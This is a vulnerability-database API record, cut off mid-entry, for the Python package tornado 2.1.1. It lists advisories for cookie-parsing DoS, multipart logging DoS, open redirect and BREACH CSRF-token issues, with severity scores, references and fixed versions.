Package Instance
Lookup for vulnerable packages by Package URL.
GET /api/packages/2269?format=api
{ "url": "http://public2.vulnerablecode.io/api/packages/2269?format=api", "purl": "pkg:pypi/tornado@2.1.1", "type": "pypi", "namespace": "", "name": "tornado", "version": "2.1.1", "qualifiers": {}, "subpath": "", "is_vulnerable": true, "next_non_vulnerable_version": "6.5.5", "latest_non_vulnerable_version": "6.5.5", "affected_by_vulnerabilities": [ { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/17485?format=api", "vulnerability_id": "VCID-3y8v-vsd8-ubba", "summary": "Tornado has an HTTP cookie parsing DoS vulnerability\nThe algorithm used for parsing HTTP cookies in Tornado versions prior to 6.4.2 sometimes has quadratic complexity, leading to excessive CPU consumption when parsing maliciously-crafted cookie headers. This parsing occurs in the event loop thread and may block the processing of other requests.\n\nSee also CVE-2024-7592 for a similar vulnerability in cpython.", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2024-52804.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2024-52804.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2024-52804", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00118", "scoring_system": "epss", "scoring_elements": "0.30691", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00118", "scoring_system": "epss", "scoring_elements": "0.30737", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00118", "scoring_system": "epss", "scoring_elements": "0.30781", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00118", "scoring_system": "epss", "scoring_elements": "0.30778", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00118", "scoring_system": "epss", "scoring_elements": "0.30746", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00118", "scoring_system": "epss", "scoring_elements": "0.30688", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00118", "scoring_system": "epss", "scoring_elements": "0.30869", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00118", "scoring_system": "epss", "scoring_elements": "0.3082", "published_at": "2026-04-02T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2024-52804" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-52804", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-52804" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://github.com/tornadoweb/tornado", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/tornadoweb/tornado" }, { "reference_url": "https://github.com/tornadoweb/tornado/commit/d5ba4a1695fbf7c6a3e54313262639b198291533", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2024-11-25T17:54:41Z/" } ], "url": "https://github.com/tornadoweb/tornado/commit/d5ba4a1695fbf7c6a3e54313262639b198291533" }, { "reference_url": "https://github.com/tornadoweb/tornado/security/advisories/GHSA-8w49-h785-mj3c", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2024-11-25T17:54:41Z/" } ], "url": "https://github.com/tornadoweb/tornado/security/advisories/GHSA-8w49-h785-mj3c" }, { "reference_url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00000.html", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00000.html" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2024-52804", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-52804" }, { "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1088112", "reference_id": "1088112", "reference_type": "", "scores": [], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1088112" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2328045", "reference_id": "2328045", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2328045" }, { "reference_url": "https://github.com/advisories/GHSA-7pwv-g7hj-39pr", "reference_id": "GHSA-7pwv-g7hj-39pr", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2024-11-25T17:54:41Z/" } ], "url": "https://github.com/advisories/GHSA-7pwv-g7hj-39pr" }, { "reference_url": "https://github.com/advisories/GHSA-8w49-h785-mj3c", "reference_id": "GHSA-8w49-h785-mj3c", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-8w49-h785-mj3c" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:10590", "reference_id": "RHSA-2024:10590", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:10590" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:10836", "reference_id": "RHSA-2024:10836", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:10836" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:10843", "reference_id": "RHSA-2024:10843", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:10843" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2025:2470", "reference_id": "RHSA-2025:2470", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2025:2470" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2025:2471", "reference_id": "RHSA-2025:2471", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2025:2471" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2025:2550", "reference_id": "RHSA-2025:2550", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2025:2550" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2025:2872", "reference_id": "RHSA-2025:2872", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2025:2872" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2025:2955", "reference_id": "RHSA-2025:2955", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2025:2955" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2025:2956", "reference_id": "RHSA-2025:2956", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2025:2956" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2025:3108", "reference_id": "RHSA-2025:3108", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2025:3108" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2025:3109", "reference_id": "RHSA-2025:3109", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2025:3109" }, { "reference_url": "https://usn.ubuntu.com/7150-1/", "reference_id": "USN-7150-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/7150-1/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/57445?format=api", "purl": "pkg:pypi/tornado@6.4.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@6.4.2" } ], "aliases": [ "CVE-2024-52804", "GHSA-8w49-h785-mj3c" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-3y8v-vsd8-ubba" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/30391?format=api", "vulnerability_id": "VCID-62bx-a5uf-j3b4", "summary": "Tornado vulnerable to excessive logging caused by malformed multipart form data\n### Summary\n\nWhen Tornado's ``multipart/form-data`` parser encounters certain errors, it logs a warning but continues trying to parse the remainder of the data. This allows remote attackers to generate an extremely high volume of logs, constituting a DoS attack. This DoS is compounded by the fact that the logging subsystem is synchronous.\n\n### Affected versions\n\nAll versions of Tornado prior to 6.5 are affected. The vulnerable parser is enabled by default.\n\n### Solution\n\nUpgrade to Tornado version 6.5. In the meantime, risk can be mitigated by blocking `Content-Type: multipart/form-data` in a proxy.", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-47287.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-47287.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-47287", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.01164", "scoring_system": "epss", "scoring_elements": "0.78614", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.01164", "scoring_system": "epss", "scoring_elements": "0.78571", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.01164", "scoring_system": "epss", "scoring_elements": "0.78603", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.01164", "scoring_system": "epss", "scoring_elements": "0.78584", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.01164", "scoring_system": "epss", "scoring_elements": "0.78609", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.01164", "scoring_system": "epss", "scoring_elements": "0.78616", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.01164", "scoring_system": "epss", "scoring_elements": "0.7864", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.01164", "scoring_system": "epss", "scoring_elements": "0.78622", "published_at": "2026-04-12T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-47287" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-47287", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-47287" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://github.com/tornadoweb/tornado", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/tornadoweb/tornado" }, { "reference_url": "https://github.com/tornadoweb/tornado/commit/b39b892bf78fe8fea01dd45199aa88307e7162f3", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2025-05-16T13:36:22Z/" } ], "url": "https://github.com/tornadoweb/tornado/commit/b39b892bf78fe8fea01dd45199aa88307e7162f3" }, { "reference_url": "https://github.com/tornadoweb/tornado/security/advisories/GHSA-7cx3-6m66-7c5m", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2025-05-16T13:36:22Z/" } ], "url": "https://github.com/tornadoweb/tornado/security/advisories/GHSA-7cx3-6m66-7c5m" }, { "reference_url": "https://lists.debian.org/debian-lts-announce/2025/05/msg00038.html", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://lists.debian.org/debian-lts-announce/2025/05/msg00038.html" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-47287", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-47287" }, { "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1105886", "reference_id": "1105886", "reference_type": "", "scores": [], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1105886" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2366703", "reference_id": "2366703", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2366703" }, { "reference_url": "https://github.com/advisories/GHSA-7cx3-6m66-7c5m", "reference_id": "GHSA-7cx3-6m66-7c5m", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-7cx3-6m66-7c5m" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2025:8135", "reference_id": "RHSA-2025:8135", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2025:8135" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2025:8136", "reference_id": "RHSA-2025:8136", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2025:8136" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2025:8223", "reference_id": "RHSA-2025:8223", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2025:8223" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2025:8226", "reference_id": "RHSA-2025:8226", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2025:8226" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2025:8254", "reference_id": "RHSA-2025:8254", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2025:8254" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2025:8279", "reference_id": "RHSA-2025:8279", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2025:8279" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2025:8290", "reference_id": "RHSA-2025:8290", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2025:8290" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2025:8291", "reference_id": "RHSA-2025:8291", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2025:8291" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2025:8323", "reference_id": "RHSA-2025:8323", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2025:8323" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2025:8664", "reference_id": "RHSA-2025:8664", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2025:8664" }, { "reference_url": "https://usn.ubuntu.com/7547-1/", "reference_id": "USN-7547-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/7547-1/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/71181?format=api", "purl": "pkg:pypi/tornado@6.5", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@6.5" } ], "aliases": [ "CVE-2025-47287", "GHSA-7cx3-6m66-7c5m" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-62bx-a5uf-j3b4" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/10334?format=api", "vulnerability_id": "VCID-6knn-nt2y-1uem", "summary": "Open redirect vulnerability in Tornado versions 6.3.1 and earlier allows a remote unauthenticated attacker to redirect a user to an arbitrary web site and conduct a phishing attack by having user access a specially crafted URL.", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2023-28370.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.4", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:H/A:N" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2023-28370.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2023-28370", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00528", "scoring_system": "epss", "scoring_elements": "0.67157", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00528", "scoring_system": "epss", "scoring_elements": "0.67187", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00528", "scoring_system": "epss", "scoring_elements": "0.67201", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00528", "scoring_system": "epss", "scoring_elements": "0.67182", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00528", "scoring_system": "epss", "scoring_elements": "0.67169", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00528", "scoring_system": "epss", "scoring_elements": "0.67119", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00528", "scoring_system": "epss", "scoring_elements": "0.67144", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00528", "scoring_system": "epss", "scoring_elements": "0.67121", "published_at": "2026-04-02T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2023-28370" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-28370", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-28370" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:N/I:L/A:N" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://github.com/pypa/advisory-database/tree/main/vulns/tornado/PYSEC-2023-75.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pypa/advisory-database/tree/main/vulns/tornado/PYSEC-2023-75.yaml" }, { "reference_url": "https://github.com/tornadoweb/tornado", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/tornadoweb/tornado" }, { "reference_url": "https://github.com/tornadoweb/tornado/commit/32ad07c54e607839273b4e1819c347f5c8976b2f", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/tornadoweb/tornado/commit/32ad07c54e607839273b4e1819c347f5c8976b2f" }, { "reference_url": "https://github.com/tornadoweb/tornado/releases/tag/v6.3.2", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-01-16T15:19:04Z/" } ], "url": "https://github.com/tornadoweb/tornado/releases/tag/v6.3.2" }, { "reference_url": "https://jvn.jp/en/jp/JVN45127776", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://jvn.jp/en/jp/JVN45127776" }, { "reference_url": "https://jvn.jp/en/jp/JVN45127776/", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-01-16T15:19:04Z/" } ], "url": "https://jvn.jp/en/jp/JVN45127776/" }, { "reference_url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00000.html", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00000.html" }, { "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1036875", "reference_id": "1036875", "reference_type": "", "scores": [], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1036875" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2210199", "reference_id": "2210199", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2210199" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2023-28370", "reference_id": "CVE-2023-28370", "reference_type": "", "scores": [ { "value": "6.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-28370" }, { "reference_url": "https://github.com/advisories/GHSA-hj3f-6gcp-jg8j", "reference_id": "GHSA-hj3f-6gcp-jg8j", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-hj3f-6gcp-jg8j" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2023:6523", "reference_id": "RHSA-2023:6523", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2023:6523" }, { "reference_url": "https://usn.ubuntu.com/6159-1/", "reference_id": "USN-6159-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/6159-1/" }, { "reference_url": "https://usn.ubuntu.com/7150-1/", "reference_id": "USN-7150-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/7150-1/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/35101?format=api", "purl": "pkg:pypi/tornado@6.3.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@6.3.2" } ], "aliases": [ "CVE-2023-28370", "GHSA-hj3f-6gcp-jg8j", "PYSEC-2023-75" ], "risk_score": 3.4, "exploitability": "0.5", "weighted_severity": "6.7", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-6knn-nt2y-1uem" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/6018?format=api", "vulnerability_id": "VCID-8kva-hv12-9ydc", "summary": "Tornado before 3.2.2 sends arbitrary responses that contain a fixed CSRF token and may be sent with HTTP compression, which makes it easier for remote attackers to conduct a BREACH attack and determine this token via a series of crafted requests.", "references": [ { "reference_url": "http://openwall.com/lists/oss-security/2015/05/19/4", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" }, { "value": "7.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "http://openwall.com/lists/oss-security/2015/05/19/4" }, { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2014-9720.json", "reference_id": "", "reference_type": "", "scores": [], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2014-9720.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2014-9720", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00904", "scoring_system": "epss", "scoring_elements": "0.75734", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00904", "scoring_system": "epss", "scoring_elements": "0.7571", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00904", "scoring_system": "epss", "scoring_elements": "0.75699", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00904", "scoring_system": "epss", "scoring_elements": "0.75665", "published_at": 